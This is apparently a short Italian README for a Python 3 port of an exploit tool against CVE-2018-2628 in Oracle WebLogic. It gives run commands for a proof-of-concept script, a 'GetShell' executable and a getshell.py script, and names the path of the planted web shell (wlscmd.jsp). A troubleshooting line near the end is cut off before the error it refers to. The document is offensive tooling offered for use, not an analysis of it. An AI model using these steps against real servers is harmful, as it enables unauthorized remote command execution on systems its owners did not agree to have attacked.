
Script eseguito in Python 3.
Basandomi sugli script dei vari predecessori, ho apportato alcune ottimizzazioni per far eseguire il codice in python3. Principalmente su Windows.
https://github.com/vulhub/vulhub/blob/master/weblogic/CVE-2018-2628/README.zh-cn.md
https://github.com/0xMJ/CVE-2018-2628

python pocweblogic.py your-ip

"Weblogic GetShell CVE-2018-2628.exe" your-ip port

Python getshell.py
Imposta la shell : http://your-ip:port/bea_wls_internal/wlscmd.jsp
Risoluzione dei problemi 1. Si verifica:
Questo accade perché il modulo requests non è installato nel tuo ambiente Python. Ti basta eseguire il seguente comando nel terminale:
pip install requests